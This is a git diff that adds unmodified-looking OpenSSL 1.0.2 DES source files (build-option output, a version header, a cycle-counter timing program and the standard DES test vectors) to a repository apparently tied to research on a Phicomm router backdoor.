+        printf("-DDES_RISC1 -DDES_PTR\n");
+        break;
+    case 9:
+        printf("-DDES_UNROLL -DDES_RISC1 -DDES_PTR\n");
+        break;
+    case 10:
+        printf("-DDES_RISC2 -DDES_PTR\n");
+        break;
+    case 11:
+        printf("-DDES_UNROLL -DDES_RISC2 -DDES_PTR\n");
+        break;
+    }
+    exit(0);
+#if defined(LINT) || defined(OPENSSL_SYS_MSDOS)
+    return (0);
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_ver.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_ver.h
new file mode 100644
index 0000000..276de2b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/des_ver.h
@@ -0,0 +1,73 @@
+/* crypto/des/des_ver.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <openssl/e_os2.h>
+
+#ifdef OPENSSL_BUILD_SHLIBCRYPTO
+# undef OPENSSL_EXTERN
+# define OPENSSL_EXTERN OPENSSL_EXPORT
+#endif
+
+/* The following macros make sure the names are different from libdes names */
+#define DES_version OSSL_DES_version
+#define libdes_version OSSL_libdes_version
+
+/* SSLeay version string */
+OPENSSL_EXTERN const char OSSL_DES_version[];
+/* old libdes version string */
+OPENSSL_EXTERN const char OSSL_libdes_version[];
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/dess.cpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/dess.cpp
new file mode 100644
index 0000000..5549bab
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/dess.cpp
@@ -0,0 +1,67 @@
+//
+// gettsc.inl
+//
+// gives access to the Pentium's (secret) cycle counter
+//
+// This software was written by Leonard Janke (janke@unixg.ubc.ca)
+// in 1996-7 and is entered, by him, into the public domain.
+
+#if defined(__WATCOMC__)
+void GetTSC(unsigned long&);
+#pragma aux GetTSC = 0x0f 0x31 "mov [edi], eax" parm [edi] modify [edx eax];
+#elif defined(__GNUC__)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  asm volatile(".byte 15, 49\n\t"
+	       : "=eax" (tsc)
+	       :
+	       : "%edx", "%eax");
+}
+#elif defined(_MSC_VER)
+inline
+void GetTSC(unsigned long& tsc)
+{
+  unsigned long a;
+  __asm _emit 0fh
+  __asm _emit 31h
+  __asm mov a, eax;
+  tsc=a;
+}
+#endif      
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/des.h>
+
+void main(int argc,char *argv[])
+	{
+	des_key_schedule key;
+	unsigned long s1,s2,e1,e2;
+	unsigned long data[2];
+	int i,j;
+
+	for (j=0; j<6; j++)
+		{
+		for (i=0; i<1000; i++) /**/
+			{
+			des_encrypt1(&data[0],key,1);
+			GetTSC(s1);
+			des_encrypt1(&data[0],key,1);
+			des_encrypt1(&data[0],key,1);
+			des_encrypt1(&data[0],key,1);
+			GetTSC(e1);
+			GetTSC(s2);
+			des_encrypt1(&data[0],key,1);
+			des_encrypt1(&data[0],key,1);
+			des_encrypt1(&data[0],key,1);
+			des_encrypt1(&data[0],key,1);
+			GetTSC(e2);
+			des_encrypt1(&data[0],key,1);
+			}
+
+		printf("des %d %d (%d)\n",
+			e1-s1,e2-s2,((e2-s2)-(e1-s1)));
+		}
+	}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/destest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/destest.c
new file mode 100644
index 0000000..c6be342
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/des/destest.c
@@ -0,0 +1,929 @@
+/* crypto/des/destest.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+
+#include <openssl/e_os2.h>
+#if defined(OPENSSL_SYS_WIN32) || defined(OPENSSL_SYS_WIN16) || defined(OPENSSL_SYS_WINDOWS)
+# ifndef OPENSSL_SYS_MSDOS
+#  define OPENSSL_SYS_MSDOS
+# endif
+#endif
+
+#ifndef OPENSSL_SYS_MSDOS
+# if !defined(OPENSSL_SYS_VMS) || defined(OPENSSL_SYS_VMS_DECC)
+#  include OPENSSL_UNISTD
+# endif
+#else
+# include <io.h>
+#endif
+#include <string.h>
+
+#ifdef OPENSSL_NO_DES
+int main(int argc, char *argv[])
+{
+    printf("No DES support\n");
+    return (0);
+}
+#else
+# include <openssl/des.h>
+
+# define crypt(c,s) (DES_crypt((c),(s)))
+
+/* tisk tisk - the test keys don't all have odd parity :-( */
+/* test data */
+# define NUM_TESTS 34
+static unsigned char key_data[NUM_TESTS][8] = {
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF},
+    {0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11},
+    {0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF},
+    {0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0xFE, 0xDC, 0xBA, 0x98, 0x76, 0x54, 0x32, 0x10},
+    {0x7C, 0xA1, 0x10, 0x45, 0x4A, 0x1A, 0x6E, 0x57},
+    {0x01, 0x31, 0xD9, 0x61, 0x9D, 0xC1, 0x37, 0x6E},
+    {0x07, 0xA1, 0x13, 0x3E, 0x4A, 0x0B, 0x26, 0x86},
+    {0x38, 0x49, 0x67, 0x4C, 0x26, 0x02, 0x31, 0x9E},
+    {0x04, 0xB9, 0x15, 0xBA, 0x43, 0xFE, 0xB5, 0xB6},
+    {0x01, 0x13, 0xB9, 0x70, 0xFD, 0x34, 0xF2, 0xCE},
+    {0x01, 0x70, 0xF1, 0x75, 0x46, 0x8F, 0xB5, 0xE6},
+    {0x43, 0x29, 0x7F, 0xAD, 0x38, 0xE3, 0x73, 0xFE},
+    {0x07, 0xA7, 0x13, 0x70, 0x45, 0xDA, 0x2A, 0x16},
+    {0x04, 0x68, 0x91, 0x04, 0xC2, 0xFD, 0x3B, 0x2F},
+    {0x37, 0xD0, 0x6B, 0xB5, 0x16, 0xCB, 0x75, 0x46},
+    {0x1F, 0x08, 0x26, 0x0D, 0x1A, 0xC2, 0x46, 0x5E},
+    {0x58, 0x40, 0x23, 0x64, 0x1A, 0xBA, 0x61, 0x76},
+    {0x02, 0x58, 0x16, 0x16, 0x46, 0x29, 0xB0, 0x07},
+    {0x49, 0x79, 0x3E, 0xBC, 0x79, 0xB3, 0x25, 0x8F},
+    {0x4F, 0xB0, 0x5E, 0x15, 0x15, 0xAB, 0x73, 0xA7},
+    {0x49, 0xE9, 0x5D, 0x6D, 0x4C, 0xA2, 0x29, 0xBF},
+    {0x01, 0x83, 0x10, 0xDC, 0x40, 0x9B, 0x26, 0xD6},
+    {0x1C, 0x58, 0x7F, 0x1C, 0x13, 0x92, 0x4F, 0xEF},
+    {0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01, 0x01},
+    {0x1F, 0x1F, 0x1F, 0x1F, 0x0E, 0x0E, 0x0E, 0x0E},
+    {0xE0, 0xFE, 0xE0, 0xFE, 0xF1, 0xFE, 0xF1, 0xFE},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF},
+    {0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF},
+    {0xFE, 0xDC, 0xBA, 0x98, 0x76, 0x54, 0x32, 0x10}
+};
+
+static unsigned char plain_data[NUM_TESTS][8] = {
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF},
+    {0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01},
+    {0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11},
+    {0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11},
+    {0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF},
+    {0x01, 0xA1, 0xD6, 0xD0, 0x39, 0x77, 0x67, 0x42},
+    {0x5C, 0xD5, 0x4C, 0xA8, 0x3D, 0xEF, 0x57, 0xDA},
+    {0x02, 0x48, 0xD4, 0x38, 0x06, 0xF6, 0x71, 0x72},
+    {0x51, 0x45, 0x4B, 0x58, 0x2D, 0xDF, 0x44, 0x0A},
+    {0x42, 0xFD, 0x44, 0x30, 0x59, 0x57, 0x7F, 0xA2},
+    {0x05, 0x9B, 0x5E, 0x08, 0x51, 0xCF, 0x14, 0x3A},
+    {0x07, 0x56, 0xD8, 0xE0, 0x77, 0x47, 0x61, 0xD2},
+    {0x76, 0x25, 0x14, 0xB8, 0x29, 0xBF, 0x48, 0x6A},
+    {0x3B, 0xDD, 0x11, 0x90, 0x49, 0x37, 0x28, 0x02},
+    {0x26, 0x95, 0x5F, 0x68, 0x35, 0xAF, 0x60, 0x9A},
+    {0x16, 0x4D, 0x5E, 0x40, 0x4F, 0x27, 0x52, 0x32},
+    {0x6B, 0x05, 0x6E, 0x18, 0x75, 0x9F, 0x5C, 0xCA},
+    {0x00, 0x4B, 0xD6, 0xEF, 0x09, 0x17, 0x60, 0x62},
+    {0x48, 0x0D, 0x39, 0x00, 0x6E, 0xE7, 0x62, 0xF2},
+    {0x43, 0x75, 0x40, 0xC8, 0x69, 0x8F, 0x3C, 0xFA},
+    {0x07, 0x2D, 0x43, 0xA0, 0x77, 0x07, 0x52, 0x92},
+    {0x02, 0xFE, 0x55, 0x77, 0x81, 0x17, 0xF1, 0x2A},
+    {0x1D, 0x9D, 0x5C, 0x50, 0x18, 0xF7, 0x28, 0xC2},
+    {0x30, 0x55, 0x32, 0x28, 0x6D, 0x6F, 0x29, 0x5A},
+    {0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF},
+    {0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF},
+    {0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF},
+    {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF}
+};
+
+static unsigned char cipher_data[NUM_TESTS][8] = {
+    {0x8C, 0xA6, 0x4D, 0xE9, 0xC1, 0xB1, 0x23, 0xA7},
+    {0x73, 0x59, 0xB2, 0x16, 0x3E, 0x4E, 0xDC, 0x58},
+    {0x95, 0x8E, 0x6E, 0x62, 0x7A, 0x05, 0x55, 0x7B},
+    {0xF4, 0x03, 0x79, 0xAB, 0x9E, 0x0E, 0xC5, 0x33},
+    {0x17, 0x66, 0x8D, 0xFC, 0x72, 0x92, 0x53, 0x2D},
+    {0x8A, 0x5A, 0xE1, 0xF8, 0x1A, 0xB8, 0xF2, 0xDD},
+    {0x8C, 0xA6, 0x4D, 0xE9, 0xC1, 0xB1, 0x23, 0xA7},
+    {0xED, 0x39, 0xD9, 0x50, 0xFA, 0x74, 0xBC, 0xC4},
+    {0x69, 0x0F, 0x5B, 0x0D, 0x9A, 0x26, 0x93, 0x9B},
+    {0x7A, 0x38, 0x9D, 0x10, 0x35, 0x4B, 0xD2, 0x71},
+    {0x86, 0x8E, 0xBB, 0x51, 0xCA, 0xB4, 0x59, 0x9A},
+    {0x71, 0x78, 0x87, 0x6E, 0x01, 0xF1, 0x9B, 0x2A},
+    {0xAF, 0x37, 0xFB, 0x42, 0x1F, 0x8C, 0x40, 0x95},
+    {0x86, 0xA5, 0x60, 0xF1, 0x0E, 0xC6, 0xD8, 0x5B},
+    {0x0C, 0xD3, 0xDA, 0x02, 0x00, 0x21, 0xDC, 0x09},
+    {0xEA, 0x67, 0x6B, 0x2C, 0xB7, 0xDB, 0x2B, 0x7A},
+    {0xDF, 0xD6, 0x4A, 0x81, 0x5C, 0xAF, 0x1A, 0x0F},
+    {0x5C, 0x51, 0x3C, 0x9C, 0x48, 0x86, 0xC0, 0x88},
+    {0x0A, 0x2A, 0xEE, 0xAE, 0x3F, 0xF4, 0xAB, 0x77},
+    {0xEF, 0x1B, 0xF0, 0x3E, 0x5D, 0xFA, 0x57, 0x5A},
+    {0x88, 0xBF, 0x0D, 0xB6, 0xD7, 0x0D, 0xEE, 0x56},
+    {0xA1, 0xF9, 0x91, 0x55, 0x41, 0x02, 0x0B, 0x56},
+    {0x6F, 0xBF, 0x1C, 0xAF, 0xCF, 0xFD, 0x05, 0x56},
+    {0x2F, 0x22, 0xE4, 0x9B, 0xAB, 0x7C, 0xA1, 0xAC},
+    {0x5A, 0x6B, 0x61, 0x2C, 0xC2, 0x6C, 0xCE, 0x4A},
+    {0x5F, 0x4C, 0x03, 0x8E, 0xD1, 0x2B, 0x2E, 0x41},
+    {0x63, 0xFA, 0xC0, 0xD0, 0x34, 0xD9, 0xF7, 0x93},
+    {0x61, 0x7B, 0x3A, 0x0C, 0xE8, 0xF0, 0x71, 0x00},
+    {0xDB, 0x95, 0x86, 0x05, 0xF8, 0xC8, 0xC6, 0x06},
+    {0xED, 0xBF, 0xD1, 0xC6, 0x6C, 0x29, 0xCC, 0xC7},
+    {0x35, 0x55, 0x50, 0xB2, 0x15, 0x0E, 0x24, 0x51},
+    {0xCA, 0xAA, 0xAF, 0x4D, 0xEA, 0xF1, 0xDB, 0xAE},
+    {0xD5, 0xD4, 0x4F, 0xF7, 0x20, 0x68, 0x3D, 0x0D},
+    {0x2A, 0x2B, 0xB0, 0x08, 0xDF, 0x97, 0xC2, 0xF2}
+};
+
+static unsigned char cipher_ecb2[NUM_TESTS - 1][8] = {
+    {0x92, 0x95, 0xB5, 0x9B, 0xB3, 0x84, 0x73, 0x6E},
+    {0x19, 0x9E, 0x9D, 0x6D, 0xF3, 0x9A, 0xA8, 0x16},
+    {0x2A, 0x4B, 0x4D, 0x24, 0x52, 0x43, 0x84, 0x27},
+    {0x35, 0x84, 0x3C, 0x01, 0x9D, 0x18, 0xC5, 0xB6},
+    {0x4A, 0x5B, 0x2F, 0x42, 0xAA, 0x77, 0x19, 0x25},
+    {0xA0, 0x6B, 0xA9, 0xB8, 0xCA, 0x5B, 0x17, 0x8A},
+    {0xAB, 0x9D, 0xB7, 0xFB, 0xED, 0x95, 0xF2, 0x74},
+    {0x3D, 0x25, 0x6C, 0x23, 0xA7, 0x25, 0x2F, 0xD6},
+    {0xB7, 0x6F, 0xAB, 0x4F, 0xBD, 0xBD, 0xB7, 0x67},
+    {0x8F, 0x68, 0x27, 0xD6, 0x9C, 0xF4, 0x1A, 0x10},
+    {0x82, 0x57, 0xA1, 0xD6, 0x50, 0x5E, 0x81, 0x85},
+    {0xA2, 0x0F, 0x0A, 0xCD, 0x80, 0x89, 0x7D, 0xFA},
+    {0xCD, 0x2A, 0x53, 0x3A, 0xDB, 0x0D, 0x7E, 0xF3},
+    {0xD2, 0xC2, 0xBE, 0x27, 0xE8, 0x1B, 0x68, 0xE3},
+    {0xE9, 0x24, 0xCF, 0x4F, 0x89, 0x3C, 0x5B, 0x0A},
+    {0xA7, 0x18, 0xC3, 0x9F, 0xFA, 0x9F, 0xD7, 0x69},
+    {0x77, 0x2C, 0x79, 0xB1, 0xD2, 0x31, 0x7E, 0xB1},
+    {0x49, 0xAB, 0x92, 0x7F, 0xD0, 0x22, 0x00, 0xB7},
+    {0xCE, 0x1C, 0x6C, 0x7D, 0x85, 0xE3, 0x4A, 0x6F},
+    {0xBE, 0x91, 0xD6, 0xE1, 0x27, 0xB2, 0xE9, 0x87},
+    {0x70, 0x28, 0xAE, 0x8F, 0xD1, 0xF5, 0x74, 0x1A},
+    {0xAA, 0x37, 0x80, 0xBB, 0xF3, 0x22, 0x1D, 0xDE},
+    {0xA6, 0xC4, 0xD2, 0x5E, 0x28, 0x93, 0xAC, 0xB3},
+    {0x22, 0x07, 0x81, 0x5A, 0xE4, 0xB7, 0x1A, 0xAD},
+    {0xDC, 0xCE, 0x05, 0xE7, 0x07, 0xBD, 0xF5, 0x84},
+    {0x26, 0x1D, 0x39, 0x2C, 0xB3, 0xBA, 0xA5, 0x85},
+    {0xB4, 0xF7, 0x0F, 0x72, 0xFB, 0x04, 0xF0, 0xDC},
+    {0x95, 0xBA, 0xA9, 0x4E, 0x87, 0x36, 0xF2, 0x89},
+    {0xD4, 0x07, 0x3A, 0xF1, 0x5A, 0x17, 0x82, 0x0E},
+    {0xEF, 0x6F, 0xAF, 0xA7, 0x66, 0x1A, 0x7E, 0x89},
+    {0xC1, 0x97, 0xF5, 0x58, 0x74, 0x8A, 0x20, 0xE7},
+    {0x43, 0x34, 0xCF, 0xDA, 0x22, 0xC4, 0x86, 0xC8},
+    {0x08, 0xD7, 0xB4, 0xFB, 0x62, 0x9D, 0x08, 0x85}
+};
+
+static unsigned char cbc_key[8] =
+    { 0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef };
+static unsigned char cbc2_key[8] =
+    { 0xf1, 0xe0, 0xd3, 0xc2, 0xb5, 0xa4, 0x97, 0x86 };
+static unsigned char cbc3_key[8] =
+    { 0xfe, 0xdc, 0xba, 0x98, 0x76, 0x54, 0x32, 0x10 };
+static unsigned char cbc_iv[8] =
+    { 0xfe, 0xdc, 0xba, 0x98, 0x76, 0x54, 0x32, 0x10 };
+/*
+ * Changed the following text constant to binary so it will work on ebcdic
+ * machines :-)
+ */
+/* static char cbc_data[40]="7654321 Now is the time for \0001"; */
+static unsigned char cbc_data[40] = {
+    0x37, 0x36, 0x35, 0x34, 0x33, 0x32, 0x31, 0x20,
+    0x4E, 0x6F, 0x77, 0x20, 0x69, 0x73, 0x20, 0x74,
+    0x68, 0x65, 0x20, 0x74, 0x69, 0x6D, 0x65, 0x20,
+    0x66, 0x6F, 0x72, 0x20, 0x00, 0x31, 0x00, 0x00,
+    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+};
+
+static unsigned char cbc_ok[32] = {
+    0xcc, 0xd1, 0x73, 0xff, 0xab, 0x20, 0x39, 0xf4,
+    0xac, 0xd8, 0xae, 0xfd, 0xdf, 0xd8, 0xa1, 0xeb,
+    0x46, 0x8e, 0x91, 0x15, 0x78, 0x88, 0xba, 0x68,
+    0x1d, 0x26, 0x93, 0x97, 0xf7, 0xfe, 0x62, 0xb4
+};
+
+# ifdef SCREW_THE_PARITY
+#  error "SCREW_THE_PARITY is not ment to be defined."
+#  error "Original vectors are preserved for reference only."
+static unsigned char cbc2_key[8] =
+    { 0xf0, 0xe1, 0xd2, 0xc3, 0xb4, 0xa5, 0x96, 0x87 };
+static unsigned char xcbc_ok[32] = {
+    0x86, 0x74, 0x81, 0x0D, 0x61, 0xA4, 0xA5, 0x48,
+    0xB9, 0x93, 0x03, 0xE1, 0xB8, 0xBB, 0xBD, 0xBD,
+    0x64, 0x30, 0x0B, 0xB9, 0x06, 0x65, 0x81, 0x76,
+    0x04, 0x1D, 0x77, 0x62, 0x17, 0xCA, 0x2B, 0xD2,
+};
+# else
+static unsigned char xcbc_ok[32] = {
+    0x84, 0x6B, 0x29, 0x14, 0x85, 0x1E, 0x9A, 0x29,
+    0x54, 0x73, 0x2F, 0x8A, 0xA0, 0xA6, 0x11, 0xC1,
+    0x15, 0xCD, 0xC2, 0xD7, 0x95, 0x1B, 0x10, 0x53,
+    0xA6, 0x3C, 0x5E, 0x03, 0xB2, 0x1A, 0xA3, 0xC4,
+};
+# endif
+
+static unsigned char cbc3_ok[32] = {
+    0x3F, 0xE3, 0x01, 0xC9, 0x62, 0xAC, 0x01, 0xD0,
+    0x22, 0x13, 0x76, 0x3C, 0x1C, 0xBD, 0x4C, 0xDC,
+    0x79, 0x96, 0x57, 0xC0, 0x64, 0xEC, 0xF5, 0xD4,
+    0x1C, 0x67, 0x38, 0x12, 0xCF, 0xDE, 0x96, 0x75
+};
+
+static unsigned char pcbc_ok[32] = {
+    0xcc, 0xd1, 0x73, 0xff, 0xab, 0x20, 0x39, 0xf4,
+    0x6d, 0xec, 0xb4, 0x70, 0xa0, 0xe5, 0x6b, 0x15,
+    0xae, 0xa6, 0xbf, 0x61, 0xed, 0x7d, 0x9c, 0x9f,
+    0xf7, 0x17, 0x46, 0x3b, 0x8a, 0xb3, 0xcc, 0x88
+};
+
+static unsigned char cfb_key[8] =
+    { 0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef };
+static unsigned char cfb_iv[8] =
+    { 0x12, 0x34, 0x56, 0x78, 0x90, 0xab, 0xcd, 0xef };
+static unsigned char cfb_buf1[40], cfb_buf2[40], cfb_tmp[8];
+static unsigned char plain[24] = {
+    0x4e, 0x6f, 0x77, 0x20, 0x69, 0x73,
+    0x20, 0x74, 0x68, 0x65, 0x20, 0x74,
+    0x69, 0x6d, 0x65, 0x20, 0x66, 0x6f,
+    0x72, 0x20, 0x61, 0x6c, 0x6c, 0x20
+};
+
+static unsigned char cfb_cipher8[24] = {
+    0xf3, 0x1f, 0xda, 0x07, 0x01, 0x14, 0x62, 0xee, 0x18, 0x7f, 0x43, 0xd8,
+    0x0a, 0x7c, 0xd9, 0xb5, 0xb0, 0xd2, 0x90, 0xda, 0x6e, 0x5b, 0x9a, 0x87
+};
+
+static unsigned char cfb_cipher16[24] = {
+    0xF3, 0x09, 0x87, 0x87, 0x7F, 0x57, 0xF7, 0x3C, 0x36, 0xB6, 0xDB, 0x70,
+    0xD8, 0xD5, 0x34, 0x19, 0xD3, 0x86, 0xB2, 0x23, 0xB7, 0xB2, 0xAD, 0x1B
+};
+
+static unsigned char cfb_cipher32[24] = {
+    0xF3, 0x09, 0x62, 0x49, 0xA4, 0xDF, 0xA4, 0x9F, 0x33, 0xDC, 0x7B, 0xAD,
+    0x4C, 0xC8, 0x9F, 0x64, 0xE4, 0x53, 0xE5, 0xEC, 0x67, 0x20, 0xDA, 0xB6
+};
+
+static unsigned char cfb_cipher48[24] = {
+    0xF3, 0x09, 0x62, 0x49, 0xC7, 0xF4, 0x30, 0xB5, 0x15, 0xEC, 0xBB, 0x85,
+    0x97, 0x5A, 0x13, 0x8C, 0x68, 0x60, 0xE2, 0x38, 0x34, 0x3C, 0xDC, 0x1F
+};
+
+static unsigned char cfb_cipher64[24] = {
+    0xF3, 0x09, 0x62, 0x49, 0xC7, 0xF4, 0x6E, 0x51, 0xA6, 0x9E, 0x83, 0x9B,
+    0x1A, 0x92, 0xF7, 0x84, 0x03, 0x46, 0x71, 0x33, 0x89, 0x8E, 0xA6, 0x22
+};
+
+static unsigned char ofb_key[8] =
+    { 0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef };
+static unsigned char ofb_iv[8] =
+    { 0x12, 0x34, 0x56, 0x78, 0x90, 0xab, 0xcd, 0xef };
+static unsigned char ofb_buf1[24], ofb_buf2[24], ofb_tmp[8];
+static unsigned char ofb_cipher[24] = {
+    0xf3, 0x09, 0x62, 0x49, 0xc7, 0xf4, 0x6e, 0x51,
+    0x35, 0xf2, 0x4a, 0x24, 0x2e, 0xeb, 0x3d, 0x3f,
+    0x3d, 0x6d, 0x5b, 0xe3, 0x25, 0x5a, 0xf8, 0xc3
+};
+
+# if 0
+static DES_LONG cbc_cksum_ret = 0xB462FEF7L;
+# else
+static DES_LONG cbc_cksum_ret = 0xF7FE62B4L;
+# endif
